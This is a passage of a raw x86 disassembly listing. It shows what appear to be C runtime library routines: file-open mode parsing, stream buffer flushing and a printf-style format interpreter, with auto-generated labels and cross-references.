mov ds:dword_4E28F4, 9
loc_421F27: ; CODE XREF: sub_421D41+B9�j
or eax, 0FFFFFFFFh
loc_421F2A: ; CODE XREF: sub_421D41+AD�j
; sub_421D41+1D3�j
pop edi
pop esi
pop ebx
leave
retn
sub_421D41 endp
; =============== S U B R O U T I N E =======================================
sub_421F2F proc near ; CODE XREF: sub_41E3C2+113�p
; sub_41E3C2+151�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4E2960
test eax, eax
jz short loc_421F47
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_421F47
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_421F47: ; CODE XREF: sub_421F2F+7�j
; sub_421F2F+12�j
xor eax, eax
retn
sub_421F2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421F4A proc near ; CODE XREF: sub_41E524+21�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:dword_4E2AD4
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_421F83
cmp al, 72h
jz short loc_421F7C
cmp al, 77h
jnz loc_42208F
mov ecx, 301h
jmp short loc_421F88
; ---------------------------------------------------------------------------
loc_421F7C: ; CODE XREF: sub_421F4A+21�j
xor ecx, ecx
or esi, 1
jmp short loc_421F8B
; ---------------------------------------------------------------------------
loc_421F83: ; CODE XREF: sub_421F4A+1D�j
mov ecx, 109h
loc_421F88: ; CODE XREF: sub_421F4A+30�j
or esi, 2
loc_421F8B: ; CODE XREF: sub_421F4A+37�j
xor edx, edx
inc edx
jmp loc_42206A
; ---------------------------------------------------------------------------
loc_421F93: ; CODE XREF: sub_421F4A+125�j
cmp edx, ebx
jz loc_422075
movsx eax, al
cmp eax, 54h
jg short loc_422014
jz short loc_422007
sub eax, 2Bh
jz short loc_421FF1
sub eax, 19h
jz short loc_421FE7
sub eax, 0Eh
jz short loc_421FD3
dec eax
jnz loc_42204C
cmp [ebp+var_4], ebx
jnz loc_42204C
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_42206A
; ---------------------------------------------------------------------------
loc_421FD3: ; CODE XREF: sub_421F4A+68�j
cmp [ebp+var_4], ebx
jnz short loc_42204C
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_42206A
; ---------------------------------------------------------------------------
loc_421FE7: ; CODE XREF: sub_421F4A+63�j
test cl, 40h
jnz short loc_42204C
or ecx, 40h
jmp short loc_42206A
; ---------------------------------------------------------------------------
loc_421FF1: ; CODE XREF: sub_421F4A+5E�j
test cl, 2
jnz short loc_42204C
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_42206A
; ---------------------------------------------------------------------------
loc_422007: ; CODE XREF: sub_421F4A+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_42204C
or ecx, eax
jmp short loc_42206A
; ---------------------------------------------------------------------------
loc_422014: ; CODE XREF: sub_421F4A+57�j
sub eax, 62h
jz short loc_42205F
dec eax
jz short loc_422047
sub eax, 0Bh
jz short loc_422033
sub eax, 6
jnz short loc_42204C
test ch, 0C0h
jnz short loc_42204C
or ecx, 4000h
jmp short loc_42206A
; ---------------------------------------------------------------------------
loc_422033: ; CODE XREF: sub_421F4A+D5�j
cmp [ebp+var_8], ebx
jnz short loc_42204C
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_42206A
; ---------------------------------------------------------------------------
loc_422047: ; CODE XREF: sub_421F4A+D0�j
cmp [ebp+var_8], ebx
jz short loc_422050
loc_42204C: ; CODE XREF: sub_421F4A+6B�j
; sub_421F4A+74�j ...
xor edx, edx
jmp short loc_42206A
; ---------------------------------------------------------------------------
loc_422050: ; CODE XREF: sub_421F4A+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_42206A
; ---------------------------------------------------------------------------
loc_42205F: ; CODE XREF: sub_421F4A+CD�j
test ch, 0C0h
jnz short loc_42204C
or ecx, 8000h
loc_42206A: ; CODE XREF: sub_421F4A+44�j
; sub_421F4A+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_421F93
loc_422075: ; CODE XREF: sub_421F4A+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_426A43
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_422093
loc_42208F: ; CODE XREF: sub_421F4A+25�j
xor eax, eax
jmp short loc_4220AD
; ---------------------------------------------------------------------------
loc_422093: ; CODE XREF: sub_421F4A+143�j
mov eax, [ebp+arg_C]
inc ds:dword_4E2944
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_4220AD: ; CODE XREF: sub_421F4A+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_421F4A endp
; =============== S U B R O U T I N E =======================================
sub_4220B2 proc near ; CODE XREF: sub_41E524�p
push ebx
push esi
push edi
mov edi, ds:dword_4E3F20
xor ebx, ebx
xor esi, esi
xor eax, eax
cmp edi, ebx
jle short loc_42211E
mov ecx, ds:dword_4E2F08
loc_4220CB: ; CODE XREF: sub_4220B2+29�j
mov edx, [ecx+eax*4]
cmp edx, ebx
jz short loc_4220E4
test byte ptr [edx+0Ch], 83h
jz short loc_4220DF
inc eax
cmp eax, edi
jl short loc_4220CB
jmp short loc_42211E
; ---------------------------------------------------------------------------
loc_4220DF: ; CODE XREF: sub_4220B2+24�j
mov esi, [ecx+eax*4]
jmp short loc_422108
; ---------------------------------------------------------------------------
loc_4220E4: ; CODE XREF: sub_4220B2+1E�j
mov edi, eax
push 20h
shl edi, 2
call sub_41E5D3
pop ecx
mov ecx, ds:dword_4E2F08
mov [edi+ecx], eax
mov eax, ds:dword_4E2F08
mov edi, [edi+eax]
cmp edi, ebx
jz short loc_42211E
mov esi, edi
loc_422108: ; CODE XREF: sub_4220B2+30�j
cmp esi, ebx
jz short loc_42211E
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebx
mov [esi+0Ch], ebx
mov [esi+8], ebx
mov [esi], ebx
mov [esi+1Ch], ebx
loc_42211E: ; CODE XREF: sub_4220B2+11�j
; sub_4220B2+2B�j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn
sub_4220B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422124 proc near ; CODE XREF: sub_41E650+49�p
; sub_41E6A6+4B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_42222D
test al, 40h
jnz loc_42222D
test al, 1
jz short loc_42215D
and dword ptr [esi+4], 0
test al, 10h
jz loc_42222D
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_42215D: ; CODE XREF: sub_422124+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_422199
cmp esi, offset dword_443520
jz short loc_422187
cmp esi, offset dword_443540
jnz short loc_422192
loc_422187: ; CODE XREF: sub_422124+59�j
push ebx
call sub_426D13
test eax, eax
pop ecx
jnz short loc_422199
loc_422192: ; CODE XREF: sub_422124+61�j
push esi
call sub_4269FF
pop ecx
loc_422199: ; CODE XREF: sub_422124+51�j
; sub_422124+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_422203
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_4221C6
push edi
push eax
push ebx
call sub_425882
mov [ebp+arg_4], eax
jmp short loc_4221F6
; ---------------------------------------------------------------------------
loc_4221C6: ; CODE XREF: sub_422124+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_4221E1
mov eax, ebx
sar eax, 5
mov eax, ds:dword_4E2BA0[eax*4]
mov ecx, ebx
and ecx, 1Fh
lea eax, [eax+ecx*8]
jmp short loc_4221E6
; ---------------------------------------------------------------------------
loc_4221E1: ; CODE XREF: sub_422124+A5�j
mov eax, offset dword_443A40
loc_4221E6: ; CODE XREF: sub_422124+BB�j
test byte ptr [eax+4], 20h
jz short loc_4221F9
push 2
push 0
push ebx
call sub_42569D
loc_4221F6: ; CODE XREF: sub_422124+A0�j
add esp, 0Ch
loc_4221F9: ; CODE XREF: sub_422124+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_422217
; ---------------------------------------------------------------------------
loc_422203: ; CODE XREF: sub_422124+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_425882
add esp, 0Ch
mov [ebp+arg_4], eax
loc_422217: ; CODE XREF: sub_422124+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_422223
or dword ptr [esi+0Ch], 20h
jmp short loc_422233
; ---------------------------------------------------------------------------
loc_422223: ; CODE XREF: sub_422124+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_422236
; ---------------------------------------------------------------------------
loc_42222D: ; CODE XREF: sub_422124+10�j
; sub_422124+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_422233: ; CODE XREF: sub_422124+FD�j
or eax, 0FFFFFFFFh
loc_422236: ; CODE XREF: sub_422124+107�j
pop esi
pop ebx
pop ebp
retn
sub_422124 endp
; =============== S U B R O U T I N E =======================================
sub_42223A proc near ; CODE XREF: sub_42226D+11�p
; sub_422291+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_422246
cmp dword ptr [ecx+8], 0
jz short loc_42226A
loc_422246: ; CODE XREF: sub_42223A+4�j
dec dword ptr [ecx+4]
js short loc_422256
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_422262
; ---------------------------------------------------------------------------
loc_422256: ; CODE XREF: sub_42223A+F�j
movsx eax, al
push ecx
push eax
call sub_422124
pop ecx
pop ecx
loc_422262: ; CODE XREF: sub_42223A+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_42226A
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_42226A: ; CODE XREF: sub_42223A+A�j
; sub_42223A+2B�j
inc dword ptr [esi]
retn
sub_42223A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42226D proc near ; CODE XREF: sub_4222C8+6EF�p
; sub_4222C8+71D�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_422288
; ---------------------------------------------------------------------------
loc_422275: ; CODE XREF: sub_42226D+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_42223A
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_42228E
loc_422288: ; CODE XREF: sub_42226D+6�j
cmp [ebp+arg_4], 0
jg short loc_422275
loc_42228E: ; CODE XREF: sub_42226D+19�j
pop esi
pop ebp
retn
sub_42226D endp
; =============== S U B R O U T I N E =======================================
sub_422291 proc near ; CODE XREF: sub_4222C8+706�p
; sub_4222C8+767�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_4222BE
cmp dword ptr [edi+8], 0
jnz short loc_4222BE
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_4222C5
; ---------------------------------------------------------------------------
loc_4222AB: ; CODE XREF: sub_422291+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_42223A
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_4222C5
loc_4222BE: ; CODE XREF: sub_422291+A�j
; sub_422291+10�j
cmp [esp+8+arg_0], 0
jg short loc_4222AB
loc_4222C5: ; CODE XREF: sub_422291+18�j
; sub_422291+2B�j
pop esi
pop ebx
retn
sub_422291 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1D4h
sub_4222C8 proc near ; CODE XREF: sub_41E650+28�p
; sub_41E6A6+2A�p ...
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_223 = byte ptr -223h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-1D4h]
sub esp, 254h
mov eax, ds:dword_4437D4
mov [ebp+1D4h+var_4], eax
xor eax, eax
mov [ebp+1D4h+var_21C], eax
mov [ebp+1D4h+var_220], eax
mov [ebp+1D4h+var_234], eax
mov eax, [ebp+1D4h+arg_4]
push ebx
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_422A8B
push esi
push edi
mov edi, eax
jmp short loc_422308
; ---------------------------------------------------------------------------
loc_422305: ; CODE XREF: sub_4222C8+7BB�j
mov ecx, [ebp+1D4h+var_244]
loc_422308: ; CODE XREF: sub_4222C8+3B�j
inc edi
cmp [ebp+1D4h+var_220], 0
mov [ebp+1D4h+arg_4], edi
jl loc_422A89
cmp bl, 20h
jl short loc_422332
cmp bl, 78h
jg short loc_422332
movsx eax, bl
movsx eax, ds:byte_4394B8[eax]
and eax, 0Fh
jmp short loc_422334
; ---------------------------------------------------------------------------
loc_422332: ; CODE XREF: sub_4222C8+54�j
; sub_4222C8+59�j
xor eax, eax
loc_422334: ; CODE XREF: sub_4222C8+68�j
movsx eax, ds:byte_4394D8[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1D4h+var_244], eax
ja loc_422A79 ; default
jmp off_422AA2[eax*4] ; switch jump
loc_422354: ; DATA XREF: seg000:off_422AA2�o
xor eax, eax ; jumptable 0042234D case 1
or [ebp+1D4h+var_214], 0FFFFFFFFh
mov [ebp+1D4h+var_240], eax
mov [ebp+1D4h+var_238], eax
mov [ebp+1D4h+var_22C], eax
mov [ebp+1D4h+var_228], eax
mov [ebp+1D4h+var_210], eax
mov [ebp+1D4h+var_230], eax
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422371: ; CODE XREF: sub_4222C8+85�j
; DATA XREF: seg000:off_422AA2�o
movsx eax, bl ; jumptable 0042234D case 2
sub eax, 20h
jz short loc_4223B4
sub eax, 3
jz short loc_4223AB
sub eax, 8
jz short loc_4223A2
dec eax
dec eax
jz short loc_422399
sub eax, 3
jnz loc_422A79 ; default
or [ebp+1D4h+var_210], 8
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422399: ; CODE XREF: sub_4222C8+BD�j
or [ebp+1D4h+var_210], 4
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_4223A2: ; CODE XREF: sub_4222C8+B9�j
or [ebp+1D4h+var_210], 1
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_4223AB: ; CODE XREF: sub_4222C8+B4�j
or byte ptr [ebp+1D4h+var_210], 80h
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_4223B4: ; CODE XREF: sub_4222C8+AF�j
or [ebp+1D4h+var_210], 2
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_4223BD: ; CODE XREF: sub_4222C8+85�j
; DATA XREF: seg000:off_422AA2�o
cmp bl, 2Ah ; jumptable 0042234D case 3
jnz short loc_4223E9
add [ebp+1D4h+arg_8], 4
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+1D4h+var_22C], eax
jge loc_422A79 ; default
or [ebp+1D4h+var_210], 4
neg [ebp+1D4h+var_22C]
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_4223E9: ; CODE XREF: sub_4222C8+F8�j
mov eax, [ebp+1D4h+var_22C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+1D4h+var_22C], eax
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_4223FE: ; CODE XREF: sub_4222C8+85�j
; DATA XREF: seg000:off_422AA2�o
and [ebp+1D4h+var_214], 0 ; jumptable 0042234D case 4
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422407: ; CODE XREF: sub_4222C8+85�j
; DATA XREF: seg000:off_422AA2�o
cmp bl, 2Ah ; jumptable 0042234D case 5
jnz short loc_422430
add [ebp+1D4h+arg_8], 4
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+1D4h+var_214], eax
jge loc_422A79 ; default
or [ebp+1D4h+var_214], 0FFFFFFFFh
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422430: ; CODE XREF: sub_4222C8+142�j
mov eax, [ebp+1D4h+var_214]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+1D4h+var_214], eax
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422445: ; CODE XREF: sub_4222C8+85�j
; DATA XREF: seg000:off_422AA2�o
cmp bl, 49h ; jumptable 0042234D case 6
jz short loc_422478
cmp bl, 68h
jz short loc_42246F
cmp bl, 6Ch
jz short loc_422466
cmp bl, 77h
jnz loc_422A79 ; default
or byte ptr [ebp+1D4h+var_210+1], 8
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422466: ; CODE XREF: sub_4222C8+18A�j
or [ebp+1D4h+var_210], 10h
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_42246F: ; CODE XREF: sub_4222C8+185�j
or [ebp+1D4h+var_210], 20h
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422478: ; CODE XREF: sub_4222C8+180�j
mov al, [edi]
cmp al, 36h
jnz short loc_422495
cmp byte ptr [edi+1], 34h
jnz short loc_422495
inc edi
inc edi
or byte ptr [ebp+1D4h+var_210+1], 80h
mov [ebp+1D4h+arg_4], edi
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422495: ; CODE XREF: sub_4222C8+1B4�j
; sub_4222C8+1BA�j
cmp al, 33h
jnz short loc_4224B0
cmp byte ptr [edi+1], 32h
jnz short loc_4224B0
inc edi
inc edi
and byte ptr [ebp+1D4h+var_210+1], 7Fh
mov [ebp+1D4h+arg_4], edi
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_4224B0: ; CODE XREF: sub_4222C8+1CF�j
; sub_4222C8+1D5�j
cmp al, 64h
jz loc_422A79 ; default
cmp al, 69h
jz loc_422A79 ; default
cmp al, 6Fh
jz loc_422A79 ; default
cmp al, 75h
jz loc_422A79 ; default
cmp al, 78h
jz loc_422A79 ; default
cmp al, 58h
jz loc_422A79 ; default
and [ebp+1D4h+var_244], 0
loc_4224E4: ; CODE XREF: sub_4222C8+85�j
; DATA XREF: seg000:off_422AA2�o
mov ecx, ds:off_4437D8 ; jumptable 0042234D case 0
and [ebp+1D4h+var_230], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_422511
mov ecx, [ebp+1D4h+arg_0]
lea esi, [ebp+1D4h+var_220]
mov al, bl
call sub_42223A
mov bl, [edi]
inc edi
mov [ebp+1D4h+arg_4], edi
loc_422511: ; CODE XREF: sub_4222C8+22E�j
mov ecx, [ebp+1D4h+arg_0]
lea esi, [ebp+1D4h+var_220]
mov al, bl
call sub_42223A
jmp loc_422A79 ; default
; ---------------------------------------------------------------------------
loc_422526: ; CODE XREF: sub_4222C8+85�j
; DATA XREF: seg000:off_422AA2�o
movsx eax, bl ; jumptable 0042234D case 7
cmp eax, 67h
jg loc_42278A
cmp eax, 65h
jge loc_4225C1
cmp eax, 58h
jg loc_422622
jz loc_42280B
sub eax, 43h
jz loc_4225E1
dec eax
dec eax
jz short loc_4225B7
dec eax
dec eax
jz short loc_4225B7
sub eax, 0Ch
jnz loc_422965
test word ptr [ebp+1D4h+var_210], 830h
jnz short loc_422570
or byte ptr [ebp+1D4h+var_210+1], 8
loc_422570: ; CODE XREF: sub_4222C8+2A2�j
; sub_4222C8+4E1�j
mov ecx, [ebp+1D4h+var_214]
cmp ecx, 0FFFFFFFFh
jnz short loc_42257D
mov ecx, 7FFFFFFFh
loc_42257D: ; CODE XREF: sub_4222C8+2AE�j
add [ebp+1D4h+arg_8], 4
test word ptr [ebp+1D4h+var_210], 810h
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
mov [ebp+1D4h+var_218], eax
jz loc_4227E0
test eax, eax
jnz short loc_4225A8
mov eax, ds:off_4437D0
mov [ebp+1D4h+var_218], eax
loc_4225A8: ; CODE XREF: sub_4222C8+2D6�j
mov eax, [ebp+1D4h+var_218]
mov [ebp+1D4h+var_230], 1
jmp loc_4227D2
; ---------------------------------------------------------------------------
loc_4225B7: ; CODE XREF: sub_4222C8+28D�j
; sub_4222C8+291�j
mov [ebp+1D4h+var_240], 1
add bl, 20h
loc_4225C1: ; CODE XREF: sub_4222C8+26D�j
or [ebp+1D4h+var_210], 40h
cmp [ebp+1D4h+var_214], 0
lea esi, [ebp+1D4h+var_20C]
mov [ebp+1D4h+var_218], esi
jge loc_4226CE
mov [ebp+1D4h+var_214], 6
jmp loc_422715
; ---------------------------------------------------------------------------
loc_4225E1: ; CODE XREF: sub_4222C8+285�j
test word ptr [ebp+1D4h+var_210], 830h
jnz short loc_4225ED
or byte ptr [ebp+1D4h+var_210+1], 8
loc_4225ED: ; CODE XREF: sub_4222C8+31F�j
; sub_4222C8+362�j
add [ebp+1D4h+arg_8], 4
test word ptr [ebp+1D4h+var_210], 810h
mov eax, [ebp+1D4h+arg_8]
jz short loc_422667
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+1D4h+var_20C]
push eax
call sub_426D3A
test eax, eax
pop ecx
pop ecx
mov [ebp+1D4h+var_21C], eax
jge short loc_422674
mov [ebp+1D4h+var_238], 1
jmp short loc_422674
; ---------------------------------------------------------------------------
loc_422622: ; CODE XREF: sub_4222C8+276�j
sub eax, 5Ah
jz short loc_42267F
sub eax, 9
jz short loc_4225ED
dec eax
jnz loc_422965
loc_422633: ; CODE XREF: sub_4222C8+4C5�j
or [ebp+1D4h+var_210], 40h
loc_422637: ; CODE XREF: sub_4222C8+4E9�j
mov [ebp+1D4h+var_21C], 0Ah
loc_42263E: ; CODE XREF: sub_4222C8+551�j
; sub_4222C8+56A�j ...
mov ebx, [ebp+1D4h+var_210]
mov esi, 8000h
test ebx, esi
jz loc_422881
mov ecx, [ebp+1D4h+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+1D4h+arg_8], ecx
jmp loc_4228AF
; ---------------------------------------------------------------------------
loc_422667: ; CODE XREF: sub_4222C8+338�j
mov al, [eax-4]
mov [ebp+1D4h+var_20C], al
mov [ebp+1D4h+var_21C], 1
loc_422674: ; CODE XREF: sub_4222C8+34F�j
; sub_4222C8+358�j
lea eax, [ebp+1D4h+var_20C]
mov [ebp+1D4h+var_218], eax
jmp loc_422965
; ---------------------------------------------------------------------------
loc_42267F: ; CODE XREF: sub_4222C8+35D�j
add [ebp+1D4h+arg_8], 4
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_4226C0
mov ecx, [eax+4]
test ecx, ecx
jz short loc_4226C0
test byte ptr [ebp+1D4h+var_210+1], 8
movsx eax, word ptr [eax]
mov [ebp+1D4h+var_218], ecx
jz short loc_4226B7
cdq
sub eax, edx
sar eax, 1
mov [ebp+1D4h+var_230], 1
jmp loc_422962
; ---------------------------------------------------------------------------
loc_4226B7: ; CODE XREF: sub_4222C8+3DC�j
and [ebp+1D4h+var_230], 0
jmp loc_422962
; ---------------------------------------------------------------------------
loc_4226C0: ; CODE XREF: sub_4222C8+3C9�j
; sub_4222C8+3D0�j
mov eax, ds:off_4437CC
mov [ebp+1D4h+var_218], eax
push eax
jmp loc_42277F
; ---------------------------------------------------------------------------
loc_4226CE: ; CODE XREF: sub_4222C8+307�j
jnz short loc_4226DE
cmp bl, 67h
jnz short loc_422715
mov [ebp+1D4h+var_214], 1
jmp short loc_422715
; ---------------------------------------------------------------------------
loc_4226DE: ; CODE XREF: sub_4222C8:loc_4226CE�j
mov eax, 200h
cmp [ebp+1D4h+var_214], eax
jle short loc_4226EB
mov [ebp+1D4h+var_214], eax
loc_4226EB: ; CODE XREF: sub_4222C8+41E�j
mov edi, 0A3h
cmp [ebp+1D4h+var_214], edi
jle short loc_422715
mov eax, [ebp+1D4h+var_214]
add eax, 15Dh
push eax
call sub_41E5D3
test eax, eax
pop ecx
mov [ebp+1D4h+var_234], eax
jz short loc_422712
mov [ebp+1D4h+var_218], eax
mov esi, eax
jmp short loc_422715
; ---------------------------------------------------------------------------
loc_422712: ; CODE XREF: sub_4222C8+441�j
mov [ebp+1D4h+var_214], edi
loc_422715: ; CODE XREF: sub_4222C8+314�j
; sub_4222C8+40B�j ...
mov eax, [ebp+1D4h+arg_8]
mov ecx, [eax]
push [ebp+1D4h+var_240]
add eax, 8
push [ebp+1D4h+var_214]
mov [ebp+1D4h+arg_8], eax
mov eax, [eax-4]
mov [ebp+1D4h+var_250], eax
movsx eax, bl
push eax
lea eax, [ebp+1D4h+var_254]
push esi
push eax
mov [ebp+1D4h+var_254], ecx
call ds:off_443A50
mov edi, [ebp+1D4h+var_210]
add esp, 14h
and edi, 80h
jz short loc_422760
cmp [ebp+1D4h+var_214], 0
jnz short loc_422760
push esi
call ds:off_443A5C
pop ecx
loc_422760: ; CODE XREF: sub_4222C8+488�j
; sub_4222C8+48E�j
cmp bl, 67h
jnz short loc_422771
test edi, edi
jnz short loc_422771
push esi
call ds:off_443A54
pop ecx
loc_422771: ; CODE XREF: sub_4222C8+49B�j
; sub_4222C8+49F�j
cmp byte ptr [esi], 2Dh
jnz short loc_42277E
or byte ptr [ebp+1D4h+var_210+1], 1
inc esi
mov [ebp+1D4h+var_218], esi
loc_42277E: ; CODE XREF: sub_4222C8+4AC�j
push esi
loc_42277F: ; CODE XREF: sub_4222C8+401�j
call sub_41E1C0
pop ecx
jmp loc_422962
; ---------------------------------------------------------------------------
loc_42278A: ; CODE XREF: sub_4222C8+264�j
sub eax, 69h
jz loc_422633
sub eax, 5
jz loc_422851
dec eax
jz loc_422837
dec eax
jz short loc_422804
sub eax, 3
jz loc_422570
dec eax
dec eax
jz loc_422637
sub eax, 3
jnz loc_422965
mov [ebp+1D4h+var_23C], 27h
jmp short loc_42280E
; ---------------------------------------------------------------------------
loc_4227C9: ; CODE XREF: sub_4222C8+50C�j
dec ecx
cmp word ptr [eax], 0
jz short loc_4227D6
inc eax
inc eax
loc_4227D2: ; CODE XREF: sub_4222C8+2EA�j
test ecx, ecx
jnz short loc_4227C9
loc_4227D6: ; CODE XREF: sub_4222C8+506�j
sub eax, [ebp+1D4h+var_218]
sar eax, 1
jmp loc_422962
; ---------------------------------------------------------------------------
loc_4227E0: ; CODE XREF: sub_4222C8+2CE�j
test eax, eax
jnz short loc_4227EC
mov eax, ds:off_4437CC
mov [ebp+1D4h+var_218], eax
loc_4227EC: ; CODE XREF: sub_4222C8+51A�j
mov eax, [ebp+1D4h+var_218]
jmp short loc_4227F8
; ---------------------------------------------------------------------------
loc_4227F1: ; CODE XREF: sub_4222C8+532�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4227FC
inc eax
loc_4227F8: ; CODE XREF: sub_4222C8+527�j
test ecx, ecx
jnz short loc_4227F1
loc_4227FC: ; CODE XREF: sub_4222C8+52D�j
sub eax, [ebp+1D4h+var_218]
jmp loc_422962
; ---------------------------------------------------------------------------
loc_422804: ; CODE XREF: sub_4222C8+4DC�j
mov [ebp+1D4h+var_214], 8
loc_42280B: ; CODE XREF: sub_4222C8+27C�j
mov [ebp+1D4h+var_23C], ecx
loc_42280E: ; CODE XREF: sub_4222C8+4FF�j
test byte ptr [ebp+1D4h+var_210], 80h
mov [ebp+1D4h+var_21C], 10h
jz loc_42263E
mov al, byte ptr [ebp+1D4h+var_23C]
add al, 51h
mov [ebp+1D4h+var_224], 30h
mov [ebp+1D4h+var_223], al
mov [ebp+1D4h+var_228], 2
jmp loc_42263E
; ---------------------------------------------------------------------------
loc_422837: ; CODE XREF: sub_4222C8+4D5�j
test byte ptr [ebp+1D4h+var_210], 80h
mov [ebp+1D4h+var_21C], 8
jz loc_42263E
or byte ptr [ebp+1D4h+var_210+1], 2
jmp loc_42263E
; ---------------------------------------------------------------------------
loc_422851: ; CODE XREF: sub_4222C8+4CE�j
add [ebp+1D4h+arg_8], 4
test byte ptr [ebp+1D4h+var_210], 20h
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
jz short loc_422870
mov cx, word ptr [ebp+1D4h+var_220]
mov [eax], cx
jmp short loc_422875
; ---------------------------------------------------------------------------
